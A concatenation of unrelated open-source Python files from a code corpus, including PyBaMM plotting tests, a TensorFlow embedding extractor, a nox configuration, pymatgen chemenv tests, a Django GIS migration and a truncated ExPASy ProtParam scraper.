self.assertEqual(quick_plot.axis_limits[("a",)][2:], [1, 2])
self.assertEqual(
quick_plot.axis_limits[("c broadcasted", "c broadcasted")][2:], [3, 4]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
quick_plot = pybamm.QuickPlot(
solution, ["a", "b broadcasted"], variable_limits={"a": "tight"}
)
self.assertEqual(quick_plot.axis_limits[("a",)][2:], [None, None])
self.assertNotEqual(
quick_plot.axis_limits[("b broadcasted",)][2:], [None, None]
)
quick_plot.plot(0)
quick_plot.slider_update(1)
with self.assertRaisesRegex(
TypeError, "variable_limits must be 'fixed', 'tight', or a dict"
):
pybamm.QuickPlot(
solution, ["a", "b broadcasted"], variable_limits="bad variable limits"
)
# Test errors
with self.assertRaisesRegex(ValueError, "Mismatching variable domains"):
pybamm.QuickPlot(solution, [["a", "b broadcasted"]])
with self.assertRaisesRegex(ValueError, "labels"):
pybamm.QuickPlot(
[solution, solution], ["a"], labels=["sol 1", "sol 2", "sol 3"]
)
# No variable can be NaN
model.variables["NaN variable"] = disc.process_symbol(pybamm.Scalar(np.nan))
with self.assertRaisesRegex(
ValueError, "All-NaN variable 'NaN variable' provided"
):
pybamm.QuickPlot(solution, ["NaN variable"])
pybamm.close_plots()
def test_spm_simulation(self):
# SPM
model = pybamm.lithium_ion.SPM()
sim = pybamm.Simulation(model)
t_eval = np.linspace(0, 10, 2)
sim.solve(t_eval)
# mixed simulation and solution input
# solution should be extracted from the simulation
quick_plot = pybamm.QuickPlot([sim, sim.solution])
quick_plot.plot(0)
pybamm.close_plots()
def test_loqs_spme(self):
t_eval = np.linspace(0, 10, 2)
for model in [pybamm.lithium_ion.SPMe(), pybamm.lead_acid.LOQS()]:
geometry = model.default_geometry
param = model.default_parameter_values
param.process_model(model)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 5, var.x_s: 5, var.x_p: 5, var.r_n: 5, var.r_p: 5}
mesh = pybamm.Mesh(geometry, model.default_submesh_types, var_pts)
disc = pybamm.Discretisation(mesh, model.default_spatial_methods)
disc.process_model(model)
solver = model.default_solver
solution = solver.solve(model, t_eval)
pybamm.QuickPlot(solution)
# check 1D (space) variables update properly for different time units
t = solution["Time [s]"].entries
c_e_var = solution["Electrolyte concentration [mol.m-3]"]
# 1D variables should be evaluated on edges
L_x = param.evaluate(pybamm.geometric_parameters.L_x)
c_e = c_e_var(t=t, x=mesh.combine_submeshes(*c_e_var.domain).edges * L_x)
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Electrolyte concentration [mol.m-3]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = (
quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][
0
].get_ydata(),
)[0]
np.testing.assert_array_almost_equal(qp_data, c_e[:, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = (
quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][
0
].get_ydata(),
)[0][:, 0]
np.testing.assert_array_almost_equal(qp_data, c_e[:, 1])
# test quick plot of particle for spme
if model.name == "Single Particle Model with electrolyte":
output_variables = [
"X-averaged negative particle concentration [mol.m-3]",
"X-averaged positive particle concentration [mol.m-3]",
"Negative particle concentration [mol.m-3]",
"Positive particle concentration [mol.m-3]",
]
pybamm.QuickPlot(solution, output_variables)
# check 2D (space) variables update properly for different time units
c_n = solution["Negative particle concentration [mol.m-3]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution,
["Negative particle concentration [mol.m-3]"],
time_unit=unit,
)
quick_plot.plot(0)
qp_data = quick_plot.plots[
("Negative particle concentration [mol.m-3]",)
][0][1]
np.testing.assert_array_almost_equal(qp_data, c_n[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[
("Negative particle concentration [mol.m-3]",)
][0][1]
np.testing.assert_array_almost_equal(qp_data, c_n[:, :, 1])
pybamm.close_plots()
def test_plot_1plus1D_spme(self):
spm = pybamm.lithium_ion.SPMe(
{"current collector": "potential pair", "dimensionality": 1}
)
geometry = spm.default_geometry
param = spm.default_parameter_values
param.process_model(spm)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 5, var.x_s: 5, var.x_p: 5, var.r_n: 5, var.r_p: 5, var.z: 5}
mesh = pybamm.Mesh(geometry, spm.default_submesh_types, var_pts)
disc_spm = pybamm.Discretisation(mesh, spm.default_spatial_methods)
disc_spm.process_model(spm)
t_eval = np.linspace(0, 100, 10)
solution = spm.default_solver.solve(spm, t_eval)
# check 2D (x,z space) variables update properly for different time units
# Note: these should be the transpose of the entries in the processed variable
c_e = solution["Electrolyte concentration [mol.m-3]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Electrolyte concentration [mol.m-3]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][1]
np.testing.assert_array_almost_equal(qp_data.T, c_e[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][1]
np.testing.assert_array_almost_equal(qp_data.T, c_e[:, :, -1])
pybamm.close_plots()
def test_plot_2plus1D_spm(self):
spm = pybamm.lithium_ion.SPM(
{"current collector": "potential pair", "dimensionality": 2}
)
geometry = spm.default_geometry
param = spm.default_parameter_values
param.process_model(spm)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {
var.x_n: 5,
var.x_s: 5,
var.x_p: 5,
var.r_n: 5,
var.r_p: 5,
var.y: 5,
var.z: 5,
}
mesh = pybamm.Mesh(geometry, spm.default_submesh_types, var_pts)
disc_spm = pybamm.Discretisation(mesh, spm.default_spatial_methods)
disc_spm.process_model(spm)
t_eval = np.linspace(0, 100, 10)
solution = spm.default_solver.solve(spm, t_eval)
quick_plot = pybamm.QuickPlot(
solution,
[
"Negative current collector potential [V]",
"Positive current collector potential [V]",
"Terminal voltage [V]",
],
)
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(1)
# check 2D (y,z space) variables update properly for different time units
phi_n = solution["Negative current collector potential [V]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Negative current collector potential [V]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = quick_plot.plots[("Negative current collector potential [V]",)][
0
][1]
np.testing.assert_array_almost_equal(qp_data, phi_n[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[("Negative current collector potential [V]",)][
0
][1]
np.testing.assert_array_almost_equal(qp_data, phi_n[:, :, -1])
with self.assertRaisesRegex(NotImplementedError, "Shape not recognized for"):
pybamm.QuickPlot(solution, ["Negative particle concentration [mol.m-3]"])
pybamm.close_plots()
def test_failure(self):
with self.assertRaisesRegex(TypeError, "solutions must be"):
pybamm.QuickPlot(1)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
StarcoderdataPython
|
3224757
|
<filename>gsoc/anand/pipeline_3/utility/vocab_extractor_from_model/embedding_extractor.py
from __future__ import print_function
import tensorflow as tf
import numpy as np
"""
- The following code when run with proper model location is capable of extracting the trained embeddings of a given model.
- The embeddings are present in the form: <word> <dimensions>
- The embedding decoder outputs sparql language embeddings
- The embedding encoder outputs english language embeddings
"""
def restore_session(self, session):
saver = tf.train.import_meta_graph('./translate.ckpt-32000.meta')
saver.restore(session, './translate.ckpt-32000')
def test_word2vec():
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.restore_session(session)
model.get_embedding("assistance")
accum = []
with tf.Session() as sess:
saver = tf.train.import_meta_graph('translate.ckpt-32000.meta')
print("***************")
print(saver.restore(sess, "translate.ckpt-32000"))
print(tf.all_variables())
lis = (sess.run(('embeddings/decoder/embedding_decoder:0')))
print(np.shape(lis))
decode = open('vocab.sparql','r').readlines()
embed = open('embed_vocab.sparql','w')
if(len(decode) == np.shape(lis)[0]):
for dec in range(len(decode)):
accum.append([decode[dec][:-1]]+list(lis[dec,:]))
temp = ' '.join(str(v) for v in accum[-1])
#print(temp)
embed.write(temp+'\n')
embed.close()
lis = (sess.run(('embeddings/encoder/embedding_encoder:0')))
print(np.shape(lis))
decode = open('vocab.en','r').readlines()
embed = open('embed_vocab.en','w')
if(len(decode) == np.shape(lis)[0]):
for dec in range(len(decode)):
accum.append([decode[dec][:-1]]+list(lis[dec,:]))
temp = ' '.join(str(v) for v in accum[-1])
#print(temp)
embed.write(temp+'\n')
embed.close()
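# For illustration: each line written to embed_vocab.en / embed_vocab.sparql has the form
# "<word> <dim_1> <dim_2> ... <dim_n>", e.g. "assistance 0.12 -0.03 ..." (embedding values here are made up).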
|
StarcoderdataPython
|
3283130
|
<filename>noxfile.py<gh_stars>1-10
import nox
@nox.session
def lint(session):
session.install('pytest>=5.3.5', 'setuptools>=45.2',
'wheel>=0.34.2', 'flake8>=3.7.9',
'numpy==1.18.1', 'pandas==1.1.4')
session.install('.')
session.run('flake8', 'sklearn_pandas/', 'tests')
@nox.session
@nox.parametrize('numpy', ['1.18.1', '1.19.4', '1.20.1'])
@nox.parametrize('scipy', ['1.4.1', '1.5.4', '1.6.0'])
@nox.parametrize('pandas', ['1.1.4', '1.2.2'])
def tests(session, numpy, scipy, pandas):
session.install('pytest>=5.3.5',
'setuptools>=45.2',
'wheel>=0.34.2',
f'numpy=={numpy}',
f'scipy=={scipy}',
f'pandas=={pandas}'
)
session.install('.')
session.run('py.test', 'README.rst', 'tests')
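# These sessions are typically invoked with e.g. `nox -s lint` or `nox -s tests`; the parametrized
# tests session expands into one run per numpy/scipy/pandas combination listed above.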
|
StarcoderdataPython
|
1687084
|
import os
API_KEY = os.environ['DATA_GOV_API_KEY']
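# Note: the os.environ lookup above raises a KeyError unless DATA_GOV_API_KEY is set beforehand,
# e.g. `export DATA_GOV_API_KEY=<your key>` (placeholder value).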
CURR_PATH = os.getcwd()
RAW_PATH = os.path.join(CURR_PATH, 'raw')
if not os.path.exists(RAW_PATH):
os.mkdir(RAW_PATH)
MIN_YEAR = 1985
MAX_YEAR = 2018
MAX_WORKERS = 2
# URLS
ORI_URL = f'https://api.usa.gov/crime/fbi/sapi/api/agencies?api_key={API_KEY}'
# Column Order of ucr_ori_crosswalk.xlsx
ORI_XWALK_COLUMNS = [
'state_abbr', 'state_name', 'ori',
'agency_name', 'agency_type_name',
'county_name', 'region_desc', 'region_name',
'division_name', 'latitude', 'longitude',
'nibrs', 'nibrs_start_date'
]
|
StarcoderdataPython
|
4813572
|
<gh_stars>0
from pytorchisland import *
|
StarcoderdataPython
|
129146
|
<gh_stars>0
from unittest import TestCase
from afrigis.url_creator import create_full_url
class TestUrlCreator(TestCase):
def setUp(self):
pass
def test_url_creator_returns_correct_url(self):
# Pre-generated url for testing purposes
correct_url = 'http://example.rest/api/service.stub/key.stub/Y4COBwOqmksoSS22XMjDyUb1x4Q'
url = create_full_url(
afrigis_key='key.stub',
afrigis_secret='secret.stub',
afrigis_base_uri='http://example.rest/api/',
service_name='service.stub',
query_parameters={
'ils_parameter.stub': 'ils_parameter_value.stub'
}
)
self.assertEqual(url, correct_url)
def test_url_creator_returns_correct_url_without_params(self):
# Pre-generated url for testing purposes
correct_url = 'http://example.rest/api/service.stub/key.stub/CFCWk-x7utrDDUjbDnd0m_Haw1Y'
url = create_full_url(
afrigis_key='key.stub',
afrigis_secret='secret.stub',
afrigis_base_uri='http://example.rest/api/',
service_name='service.stub'
)
self.assertEqual(url, correct_url)
|
StarcoderdataPython
|
3359577
|
<filename>windyquery/tests/test_delete.py<gh_stars>10-100
import asyncio
from windyquery import DB
loop = asyncio.get_event_loop()
def test_delete(db: DB):
rows = loop.run_until_complete(db.table('users').insert(
{'email': '<EMAIL>', 'password': '<PASSWORD>'}).returning())
assert rows[0]['email'] == '<EMAIL>'
loop.run_until_complete(
db.table('users').where('id', rows[0]['id']).delete())
rows = loop.run_until_complete(
db.table('users').select().where('id', rows[0]['id']))
assert len(rows) == 0
|
StarcoderdataPython
|
176999
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.gis.db.models.fields
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Biome',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('biome', models.CharField(max_length=50, choices=[('BARE', 'Bare'), ('BEACH', 'Beach'), ('GRASSLAND', 'Grassland'), ('ICE', 'Ice'), ('LAKE', 'Lake'), ('MARSH', 'Marsh'), ('OCEAN', 'OCEAN'), ('SCORCHED', 'Scorched'), ('SHRUBLAND', 'Shrubland'), ('SNOW', 'Snow'), ('SUBTROPICAL_DESERT', 'Subtropical deset'), ('TAIGA', 'Taiga'), ('TEMPERATE_DECIDUOUS_FOREST', 'Deciduous foreset'), ('TEMPERATE_DESERT', 'Desert'), ('TEMPERATE_RAIN_FOREST', 'Rain forest'), ('TROPICAL_RAIN_FOREST', 'Tropical rain forest'), ('TROPICAL_SEASONAL_FOREST', 'Tropical seasonal forest'), ('TUNDRA', 'Tundra')])),
('border', models.BooleanField()),
('coast', models.BooleanField()),
('ocean', models.BooleanField()),
('water', models.BooleanField()),
('elevation', models.FloatField()),
('moisture', models.FloatField()),
('river', models.BooleanField()),
('center', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
('neighbors', models.ManyToManyField(to='main.Biome', related_name='neighbors_rel_+')),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('capital', models.BooleanField(default=False)),
('name', models.CharField(max_length=100)),
('coords', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('biome', models.ForeignKey(to='main.Biome')),
],
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
('name', models.CharField(max_length=100)),
('neighbors', models.ManyToManyField(to='main.Region', related_name='neighbors_rel_+')),
],
),
migrations.CreateModel(
name='River',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('width', models.PositiveIntegerField()),
('geom', django.contrib.gis.db.models.fields.MultiLineStringField(srid=4326)),
],
),
migrations.AddField(
model_name='city',
name='region',
field=models.ForeignKey(to='main.Region'),
),
migrations.AddField(
model_name='biome',
name='region',
field=models.ForeignKey(to='main.Region', blank=True, null=True),
),
migrations.AlterUniqueTogether(
name='city',
unique_together=set([('region', 'capital')]),
),
]
|
StarcoderdataPython
|
4827916
|
<gh_stars>10-100
import copy
import pathlib
import sys
from typing import Any
from typing import Optional
import attr
from sqlalchemy.engine import Engine
import toml
from .types.namespace import namespace
from .utils.cast import CastError
from .utils.cast import cast
DEFAULT = {
'DEBUG': False,
'RECEIVE_TIMEOUT': 300, # 60 * 5 seconds
'REGISTER_CRONTAB': True,
'PREFIX': '',
'APPS': (),
'DATABASE_URL': '',
'DATABASE_ECHO': False,
'LOGGING': {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'brief': {'format': '%(message)s'},
'default': {
'format': '%(asctime)s %(levelname)s %(name)s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'brief',
'level': 'INFO',
'filters': [],
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'default',
'level': 'WARNING',
'filename': 'log/warning.log',
'maxBytes': 1024,
'backupCount': 3,
},
},
'loggers': {
'yui': {
'handlers': ['console', 'file'],
'propagate': True,
'level': 'INFO',
},
},
},
'CACHE': {'HOST': 'localhost', 'PORT': 11211, 'PREFIX': 'YUI_'},
}
class ConfigurationError(Exception):
pass
@namespace
class Config:
TOKEN: str
RECEIVE_TIMEOUT: int
DEBUG: bool
PREFIX: str
APPS: list[str]
DATABASE_URL: str
DATABASE_ECHO: bool
LOGGING: dict[str, Any]
REGISTER_CRONTAB: bool
CHANNELS: dict[str, Any]
USERS: dict[str, Any]
CACHE: dict[str, Any]
WEBSOCKETDEBUGGERURL: Optional[str] = None
DATABASE_ENGINE: Engine = attr.ib(init=False, repr=False, cmp=False)
def check(
self,
configs: dict[str, Any],
single_channels: set[str],
multiple_channels: set[str],
single_users: set[str],
multiple_users: set[str],
) -> bool:
for key, value in configs.items():
try:
config = getattr(self, key)
except AttributeError:
raise ConfigurationError(
f'Required config key was not defined: {key}'
)
try:
casted = cast(value, config)
if config != casted:
raise CastError
except CastError:
raise ConfigurationError(f'Wrong config value type: {key}')
for key in single_channels:
try:
value = self.CHANNELS[key]
except KeyError:
raise ConfigurationError(
f'Required channel key was not defined: {key}'
)
else:
if not isinstance(value, str):
raise ConfigurationError(
f'Channel config has wrong type: {key}'
)
for key in multiple_channels:
try:
value = self.CHANNELS[key]
except KeyError:
raise ConfigurationError(
f'Required channel key was not defined: {key}'
)
else:
if value == '*':
continue
elif isinstance(value, list):
if all(isinstance(x, str) for x in value):
continue
raise ConfigurationError(
f'Channel config has wrong type: {key}'
)
for key in single_users:
try:
value = self.USERS[key]
except KeyError:
raise ConfigurationError(
f'Required user key was not defined: {key}'
)
else:
if not isinstance(value, str):
raise ConfigurationError(
f'User config has wrong type: {key}'
)
for key in multiple_users:
try:
value = self.USERS[key]
except KeyError:
raise ConfigurationError(
f'Required user key was not defined: {key}'
)
else:
if value == '*':
continue
elif isinstance(value, list):
if all(isinstance(x, str) for x in value):
continue
raise ConfigurationError(f'User config has wrong type: {key}')
return True
def error(message: str, *args):
msg = message.format(*args)
print(msg, file=sys.stderr)
raise SystemExit(1)
def load(path: pathlib.Path) -> Config:
"""Load configuration from given path."""
if not path.exists():
        error('File does not exist.')
    if not path.is_file():
        error('Given path is not a file.')
if not path.match('*.config.toml'):
error('File suffix must be *.config.toml')
config_dict = copy.deepcopy(DEFAULT)
config_dict.update(toml.load(path.open()))
try:
config = Config(**config_dict)
except TypeError as e: # pragma: no cover
error(str(e))
raise
return config
|
StarcoderdataPython
|
3286122
|
<reponame>kjappelbaum/pymatgen
#!/usr/bin/env python
__author__ = "waroquiers"
import json
import os
import shutil
import unittest
import numpy as np
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import (
AngleNbSetWeight,
CNBiasNbSetWeight,
DeltaCSMNbSetWeight,
DistanceAngleAreaNbSetWeight,
MultiWeightsChemenvStrategy,
NormalizedAngleDistanceNbSetWeight,
SelfCSMNbSetWeight,
SimplestChemenvStrategy,
)
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import (
LocalGeometryFinder,
)
from pymatgen.analysis.chemenv.coordination_environments.structure_environments import (
LightStructureEnvironments,
StructureEnvironments,
)
from pymatgen.analysis.chemenv.coordination_environments.voronoi import (
DetailedVoronoiContainer,
)
from pymatgen.core.structure import Structure
json_files_dir = os.path.join(
os.path.dirname(__file__),
"..",
"..",
"..",
"..",
"..",
"test_files",
"chemenv",
"json_test_files",
)
se_files_dir = os.path.join(
os.path.dirname(__file__),
"..",
"..",
"..",
"..",
"..",
"test_files",
"chemenv",
"structure_environments_files",
)
class ReadWriteChemenvTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.lgf = LocalGeometryFinder()
cls.lgf.setup_parameters(centering_type="standard")
os.makedirs("tmp_dir")
def test_read_write_structure_environments(self):
f = open("{}/{}".format(json_files_dir, "test_T--4_FePO4_icsd_4266.json"), "r")
dd = json.load(f)
f.close()
atom_indices = dd["atom_indices"]
struct = Structure.from_dict(dd["structure"])
self.lgf.setup_structure(struct)
se = self.lgf.compute_structure_environments(
only_indices=atom_indices, maximum_distance_factor=2.25, get_from_hints=True
)
f = open("tmp_dir/se.json", "w")
json.dump(se.as_dict(), f)
f.close()
f = open("tmp_dir/se.json", "r")
dd = json.load(f)
f.close()
se2 = StructureEnvironments.from_dict(dd)
self.assertEqual(se, se2)
strategy = SimplestChemenvStrategy()
lse = LightStructureEnvironments.from_structure_environments(
structure_environments=se, strategy=strategy, valences="undefined"
)
f = open("tmp_dir/lse.json", "w")
json.dump(lse.as_dict(), f)
f.close()
f = open("tmp_dir/lse.json", "r")
dd = json.load(f)
f.close()
lse2 = LightStructureEnvironments.from_dict(dd)
self.assertEqual(lse, lse2)
def test_structure_environments_neighbors_sets(self):
f = open("{}/{}".format(se_files_dir, "se_mp-7000.json"), "r")
dd = json.load(f)
f.close()
se = StructureEnvironments.from_dict(dd)
isite = 6
nb_set = se.neighbors_sets[isite][4][0]
nb_set_surface_points = np.array(
[
[1.0017922780870239, 0.99301365328679292],
[1.0017922780870239, 0.0],
[2.2237615554448569, 0.0],
[2.2237615554448569, 0.0060837],
[2.25, 0.0060837],
[2.25, 0.99301365328679292],
]
)
self.assertTrue(
np.allclose(
np.array(nb_set.voronoi_grid_surface_points()), nb_set_surface_points
)
)
neighb_sites = nb_set.neighb_sites
coords = [
np.array([0.2443798, 1.80409653, -1.13218359]),
np.array([1.44020353, 1.11368738, 1.13218359]),
np.array([2.75513098, 2.54465207, -0.70467298]),
np.array([0.82616785, 3.65833945, 0.70467298]),
]
np.testing.assert_array_almost_equal(coords[0], neighb_sites[0].coords)
np.testing.assert_array_almost_equal(coords[1], neighb_sites[1].coords)
np.testing.assert_array_almost_equal(coords[2], neighb_sites[2].coords)
np.testing.assert_array_almost_equal(coords[3], neighb_sites[3].coords)
neighb_coords = nb_set.coords
np.testing.assert_array_almost_equal(coords, neighb_coords[1:])
np.testing.assert_array_almost_equal(
nb_set.structure[nb_set.isite].coords, neighb_coords[0]
)
normdist = nb_set.normalized_distances
self.assertAlmostEqual(
sorted(normdist),
sorted([1.0017922783963027, 1.0017922780870239, 1.000000000503177, 1.0]),
)
normang = nb_set.normalized_angles
self.assertAlmostEqual(
sorted(normang),
sorted([0.9999999998419052, 1.0, 0.9930136530585189, 0.9930136532867929]),
)
dist = nb_set.distances
self.assertAlmostEqual(
sorted(dist),
sorted(
[
1.6284399814843944,
1.6284399809816534,
1.6255265861208676,
1.6255265853029401,
]
),
)
ang = nb_set.angles
self.assertAlmostEqual(
sorted(ang),
sorted(
[
3.117389876236432,
3.117389876729275,
3.095610709498583,
3.0956107102102024,
]
),
)
nb_set_info = nb_set.info
self.assertAlmostEqual(nb_set_info["normalized_angles_mean"], 0.996506826547)
self.assertAlmostEqual(
nb_set_info["normalized_distances_std"], 0.000896138995037
)
self.assertAlmostEqual(nb_set_info["angles_std"], 0.0108895833142)
self.assertAlmostEqual(nb_set_info["distances_std"], 0.00145669776056)
self.assertAlmostEqual(nb_set_info["distances_mean"], 1.62698328347)
self.assertEqual(
nb_set.__str__(),
"Neighbors Set for site #6 :\n"
" - Coordination number : 4\n"
" - Voronoi indices : 1, 4, 5, 6\n",
)
self.assertFalse(nb_set.__ne__(nb_set))
self.assertEqual(nb_set.__hash__(), 4)
def test_strategies(self):
simplest_strategy_1 = SimplestChemenvStrategy()
simplest_strategy_2 = SimplestChemenvStrategy(
distance_cutoff=1.5, angle_cutoff=0.5
)
self.assertFalse(simplest_strategy_1 == simplest_strategy_2)
simplest_strategy_1_from_dict = SimplestChemenvStrategy.from_dict(
simplest_strategy_1.as_dict()
)
self.assertTrue(simplest_strategy_1, simplest_strategy_1_from_dict)
effective_csm_estimator = {
"function": "power2_inverse_decreasing",
"options": {"max_csm": 8.0},
}
self_csm_weight = SelfCSMNbSetWeight()
surface_definition = {
"type": "standard_elliptic",
"distance_bounds": {"lower": 1.1, "upper": 1.9},
"angle_bounds": {"lower": 0.1, "upper": 0.9},
}
surface_definition_2 = {
"type": "standard_elliptic",
"distance_bounds": {"lower": 1.1, "upper": 1.9},
"angle_bounds": {"lower": 0.1, "upper": 0.95},
}
da_area_weight = DistanceAngleAreaNbSetWeight(
weight_type="has_intersection",
surface_definition=surface_definition,
nb_sets_from_hints="fallback_to_source",
other_nb_sets="0_weight",
additional_condition=DistanceAngleAreaNbSetWeight.AC.ONLY_ACB,
)
da_area_weight_2 = DistanceAngleAreaNbSetWeight(
weight_type="has_intersection",
surface_definition=surface_definition_2,
nb_sets_from_hints="fallback_to_source",
other_nb_sets="0_weight",
additional_condition=DistanceAngleAreaNbSetWeight.AC.ONLY_ACB,
)
weight_estimator = {
"function": "smootherstep",
"options": {"delta_csm_min": 0.5, "delta_csm_max": 3.0},
}
symmetry_measure_type = "csm_wcs_ctwcc"
delta_weight = DeltaCSMNbSetWeight(
effective_csm_estimator=effective_csm_estimator,
weight_estimator=weight_estimator,
symmetry_measure_type=symmetry_measure_type,
)
bias_weight = CNBiasNbSetWeight.linearly_equidistant(
weight_cn1=1.0, weight_cn13=4.0
)
bias_weight_2 = CNBiasNbSetWeight.linearly_equidistant(
weight_cn1=1.0, weight_cn13=5.0
)
angle_weight = AngleNbSetWeight()
nad_weight = NormalizedAngleDistanceNbSetWeight(
average_type="geometric", aa=1, bb=1
)
multi_weights_strategy_1 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_2 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight_2,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_3 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight_2,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_1_from_dict = MultiWeightsChemenvStrategy.from_dict(
multi_weights_strategy_1.as_dict()
)
self.assertTrue(multi_weights_strategy_1 == multi_weights_strategy_1_from_dict)
self.assertFalse(simplest_strategy_1 == multi_weights_strategy_1)
self.assertFalse(multi_weights_strategy_1 == multi_weights_strategy_2)
self.assertFalse(multi_weights_strategy_1 == multi_weights_strategy_3)
self.assertFalse(multi_weights_strategy_2 == multi_weights_strategy_3)
def test_read_write_voronoi(self):
f = open("{}/{}".format(json_files_dir, "test_T--4_FePO4_icsd_4266.json"), "r")
dd = json.load(f)
f.close()
struct = Structure.from_dict(dd["structure"])
valences = [site.specie.oxi_state for site in struct]
detailed_voronoi_container = DetailedVoronoiContainer(
structure=struct, valences=valences
)
f = open("tmp_dir/se.json", "w")
json.dump(detailed_voronoi_container.as_dict(), f)
f.close()
f = open("tmp_dir/se.json", "r")
dd = json.load(f)
f.close()
detailed_voronoi_container2 = DetailedVoronoiContainer.from_dict(dd)
self.assertEqual(detailed_voronoi_container, detailed_voronoi_container2)
@classmethod
def tearDownClass(cls):
# Remove the directory in which the temporary files have been created
shutil.rmtree("tmp_dir")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
67756
|
import logging
from simuvex.s_format import FormatParser
l = logging.getLogger("simuvex.procedures.snprintf")
######################################
# snprintf
######################################
class snprintf(FormatParser):
def run(self, dst_ptr, size): # pylint:disable=arguments-differ,unused-argument
#additional code
trace_data = ("snprintf", {"dst_ptr": (dst_ptr, dst_ptr.symbolic), "size": (size, size.symbolic)})
try:
self.state.procedure_data.global_variables["trace"].append(trace_data)
except KeyError:
self.state.procedure_data.global_variables["trace"] = []
self.state.procedure_data.global_variables["trace"].append(trace_data)
#end of additional code
# The format str is at index 2
fmt_str = self._parse(2)
out_str = fmt_str.replace(3, self.arg)
self.state.memory.store(dst_ptr, out_str)
# place the terminating null byte
self.state.memory.store(dst_ptr + (out_str.size() / 8), self.state.se.BVV(0, 8))
# size_t has size arch.bits
return self.state.se.BVV(out_str.size()/8, self.state.arch.bits)
|
StarcoderdataPython
|
120739
|
<filename>biomagicbox/expasy.py<gh_stars>0
import requests
import re,os,sqlite3
import threading
class ProtParam():
def __init__(self,dbname,tablename):
self.dbname=dbname
self.tablename=tablename
self.finish_num=0
self.url='https://web.expasy.org/cgi-bin/protparam/protparam'
self.headers={'Content-Type':'application/x-www-form-urlencoded'}
self.create_db()
def load_gene(self,filename):
with open(filename,encoding='utf-8') as f:
data=f.read().split('\n')
header=data[0].split(',')
exited_gene=self.view_db()
gene_ls=[]
for i in data[1:]:
if i!='':
temp=i.split(',')
if temp[0] not in exited_gene:
gene_ls.append((temp[0],temp[1]))
self.gene_ls=gene_ls
def create_db(self):
if not os.path.exists(self.dbname):
conn = sqlite3.connect(self.dbname)
conn.execute("CREATE TABLE "+self.tablename+"(GeneID TEXT,aa REAL, weight REAL, pI REAL, Instability REAL, Aliphatic REAL, GRAVY REAL, negatively REAL, positively REAL, Formula TEXT)")
conn.close()
def view_db(self):
conn = sqlite3.connect(self.dbname)
r=conn.execute("select GeneID from "+self.tablename)
ls=[i[0] for i in r.fetchall()]
return ls
def save_db(self,s):
conn=sqlite3.connect(self.dbname)
conn.execute("INSERT INTO "+self.tablename+" VALUES ("+s+")")
conn.commit()
conn.close()
def process_ls(self,geneid,ls):
